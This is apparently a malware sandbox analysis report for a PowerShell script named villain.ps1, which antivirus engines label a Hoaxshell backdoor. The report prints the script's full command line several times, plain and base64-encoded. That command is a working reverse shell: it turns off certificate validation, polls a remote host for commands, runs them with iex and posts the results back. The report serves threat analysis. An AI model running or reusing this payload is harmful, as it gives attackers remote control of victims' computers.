NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051f7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051f8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051f9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051fd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051fe000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051ff000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05200000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05201000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -e UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAUABTAEgATwBNAEUAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAewBhAGQAZAAtAHQAeQBwAGUAIABAACIACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0ADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFgANQAwADkAQwBlAHIAdABpAGYAaQBjAGEAdABlAHMAOwAKAHAAdQBiAGwAaQBjACAAYwBsAGEAcwBzACAAVAByAHUAcwB0AEEAbABsAEMAZQByAHQAcwBQAG8AbABpAGMAeQAgADoAIABJAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBQAG8AbABpAGMAeQAgAHsAcAB1AGIAbABpAGMAIABiAG8AbwBsACAAQwBoAGUAYwBrAFYAYQBsAGkAZABhAHQAaQBvAG4AUgBlAHMAdQBsAHQAKAAKAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0ACAAcwByAHYAUABvAGkAbgB0ACwAIABYADUAMAA5AEMAZQByAHQAaQBmAGkAYwBhAHQAZQAgAGMAZQByAHQAaQBmAGkAYwBhAHQAZQAsAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAByAGUAcQB1AGUAcwB0ACwAIABpAG4AdAAgAGMAZQByAHQAaQBmAGkAYwBhAHQAZQBQAHIAbwBiAGwAZQBtACkAIAB7AHIAZQB0AHUAcgBuACAAdAByAHUAZQA7AH0AfQAKACIAQAAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAQwBlAHIAdABpAGYAaQBjAGEAdABlAFAAbwBsAGkAYwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABUAHIAdQBzAHQAQQBsAGwAQwBlAHIAdABzAFAAbwBsAGkAYwB5AAoAJABDAG8AbgBmAGkAcgBtAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAE4AbwBuAGUAIgA7ACQAcwA9ACcAdQBzAC4AbABvAGMAbAB4AC4AaQBvADoAOQAwADAAMwAnADsAJABpAD0AJwA1ADUAZABkADEANgAtADMAYgBkADYAMQA1AC0AMQAzAGMAMQAxAGEAJwA7ACQAcAA9ACcAaAB0AHQAcABzADoALwAvACcAOwAkAHYAPQBJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAcAAkAHMALwA1ADUAZABkADEANgAvACQAZQBuAHYAOgBDAE8ATQBQAFUAVABFAFIATgBBAE0ARQAvACQAZQBuAHYAOgBVAFMARQBSAE4AQQBNAEUAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBBAHUAdABoAG8AcgBpAHoAYQB0AGkAbwBuACIAPQAkAGkAfQA7AGYAbwByACAAKAA7ADsAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMwBiAGQANgAxADUAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBBAHUAdABoAG8AcgBpAHoAYQB0AGkAbwBuACIAPQAkAGkAfQApADsAaQBmACAAKAAkAGMAIAAtAG4AZQAgACcATgBvAG4AZQAnACkAIAB7ACQAcgA9AGkAZQB4ACAAJABjACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAHQAbwBwACAALQBFAHIAcgBvAHIAVgBhAHIAaQBhAGIAbABlACAAZQA7ACQAcgA9AE8AdQB0AC0AUwB0AHIAaQBuAGcAIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAcgA7ACQAeAA9AEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQByAGkAIAAkAHAAJABzAC8AMQAzAGMAMQAxAGEAIAAtAE0AZQB0AGgAbwBkACAAUABPAFMAVAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAEEAdQB0AGgAbwByAGkAegBhAHQAaQBvAG4AIgA9ACQAaQB9ACAALQBCAG8AZAB5ACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABlACsAJAByACkAIAAtAGoAbwBpAG4AIAAnACAAJwApADsAJAByAD0AJwAnADsAfQAgAHMAbABlAGUAcAAgADAALgA4AH0AfQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A
cmdline	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe add-type @" using System.Net;using System.Security.Cryptography.X509Certificates; public class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult( ServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}} "@ [System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy $ConfirmPreference="None";$s='us.loclx.io:9003';$i='55dd16-3bd615-13c11a';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/55dd16/$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/3bd615 -Headers @{"Authorization"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/13c11a -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ');$r='';} sleep 0.8}
cmdline	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" add-type @" using System.Net;using System.Security.Cryptography.X509Certificates; public class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult( ServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}} "@ [System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy $ConfirmPreference="None";$s='us.loclx.io:9003';$i='55dd16-3bd615-13c11a';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/55dd16/$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/3bd615 -Headers @{"Authorization"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/13c11a -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ');$r='';} sleep 0.8}

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Jan. 24, 2025, 1:52 p.m.	show_type: 0 filepath_r: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe parameters: add-type @" using System.Net;using System.Security.Cryptography.X509Certificates; public class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult( ServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}} "@ [System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy $ConfirmPreference="None";$s='us.loclx.io:9003';$i='55dd16-3bd615-13c11a';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/55dd16/$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/3bd615 -Headers @{"Authorization"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/13c11a -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ');$r='';} sleep 0.8} filepath: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	1	1	0

File has been identified by 7 AntiVirus engines on VirusTotal as malicious (7 events)

ESET-NOD32	PowerShell/Agent.AWJ
Kaspersky	UDS:DangerousObject.Multi.Generic
Ikarus	Trojan.PowerShell.Agent
Google	Detected
Kingsoft	Win32.Troj.Undef.a
GData	Script.Trojan.Agent.7P9F9Y
Tencent	Win32.Backdoor.Hoaxshell.Mqil

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Jan. 24, 2025, 1:52 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Jan. 24, 2025, 1:52 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -e UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAUABTAEgATwBNAEUAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAewBhAGQAZAAtAHQAeQBwAGUAIABAACIACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0ADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFgANQAwADkAQwBlAHIAdABpAGYAaQBjAGEAdABlAHMAOwAKAHAAdQBiAGwAaQBjACAAYwBsAGEAcwBzACAAVAByAHUAcwB0AEEAbABsAEMAZQByAHQAcwBQAG8AbABpAGMAeQAgADoAIABJAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBQAG8AbABpAGMAeQAgAHsAcAB1AGIAbABpAGMAIABiAG8AbwBsACAAQwBoAGUAYwBrAFYAYQBsAGkAZABhAHQAaQBvAG4AUgBlAHMAdQBsAHQAKAAKAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0ACAAcwByAHYAUABvAGkAbgB0ACwAIABYADUAMAA5AEMAZQByAHQAaQBmAGkAYwBhAHQAZQAgAGMAZQByAHQAaQBmAGkAYwBhAHQAZQAsAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAByAGUAcQB1AGUAcwB0ACwAIABpAG4AdAAgAGMAZQByAHQAaQBmAGkAYwBhAHQAZQBQAHIAbwBiAGwAZQBtACkAIAB7AHIAZQB0AHUAcgBuACAAdAByAHUAZQA7AH0AfQAKACIAQAAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAQwBlAHIAdABpAGYAaQBjAGEAdABlAFAAbwBsAGkAYwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABUAHIAdQBzAHQAQQBsAGwAQwBlAHIAdABzAFAAbwBsAGkAYwB5AAoAJABDAG8AbgBmAGkAcgBtAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAE4AbwBuAGUAIgA7ACQAcwA9ACcAdQBzAC4AbABvAGMAbAB4AC4AaQBvADoAOQAwADAAMwAnADsAJABpAD0AJwA1ADUAZABkADEANgAtADMAYgBkADYAMQA1AC0AMQAzAGMAMQAxAGEAJwA7ACQAcAA9ACcAaAB0AHQAcABzADoALwAvACcAOwAkAHYAPQBJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAcAAkAHMALwA1ADUAZABkADEANgAvACQAZQBuAHYAOgBDAE8ATQBQAFUAVABFAFIATgBBAE0ARQAvACQAZQBuAHYAOgBVAFMARQBSAE4AQQBNAEUAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBBAHUAdABoAG8AcgBpAHoAYQB0AGkAbwBuACIAPQAkAGkAfQA7AGYAbwByACAAKAA7ADsAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMwBiAGQANgAxADUAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBBAHUAdABoAG8AcgBpAHoAYQB0AGkAbwBuACIAPQAkAGkAfQApADsAaQBmACAAKAAkAGMAIAAtAG4AZQAgACcATgBvAG4AZQAnACkAIAB7ACQAcgA9AGkAZQB4ACAAJABjACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAHQAbwBwACAALQBFAHIAcgBvAHIAVgBhAHIAaQBhAGIAbABlACAAZQA7ACQAcgA9AE8AdQB0AC0AUwB0AHIAaQBuAGcAIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAcgA7ACQAeAA9AEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQByAGkAIAAkAHAAJABzAC8AMQAzAGMAMQAxAGEAIAAtAE0AZQB0AGgAbwBkACAAUABPAFMAVAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAEEAdQB0AGgAbwByAGkAegBhAHQAaQBvAG4AIgA9ACQAaQB9ACAALQBCAG8AZAB5ACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABlACsAJAByACkAIAAtAGoAbwBpAG4AIAAnACAAJwApADsAJAByAD0AJwAnADsAfQAgAHMAbABlAGUAcAAgADAALgA4AH0AfQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A
parent_process	powershell.exe	martian_process	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe add-type @" using System.Net;using System.Security.Cryptography.X509Certificates; public class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult( ServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}} "@ [System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy $ConfirmPreference="None";$s='us.loclx.io:9003';$i='55dd16-3bd615-13c11a';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/55dd16/$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/3bd615 -Headers @{"Authorization"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/13c11a -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ');$r='';} sleep 0.8}
parent_process	powershell.exe	martian_process	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" add-type @" using System.Net;using System.Security.Cryptography.X509Certificates; public class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult( ServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}} "@ [System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy $ConfirmPreference="None";$s='us.loclx.io:9003';$i='55dd16-3bd615-13c11a';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/55dd16/$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/3bd615 -Headers @{"Authorization"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/13c11a -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ');$r='';} sleep 0.8}

Creates a suspicious Powershell process (1 event)

option

-ep bypass

value

Attempts to bypass execution policy

The process powershell.exe wrote an executable file to disk (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

villain.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All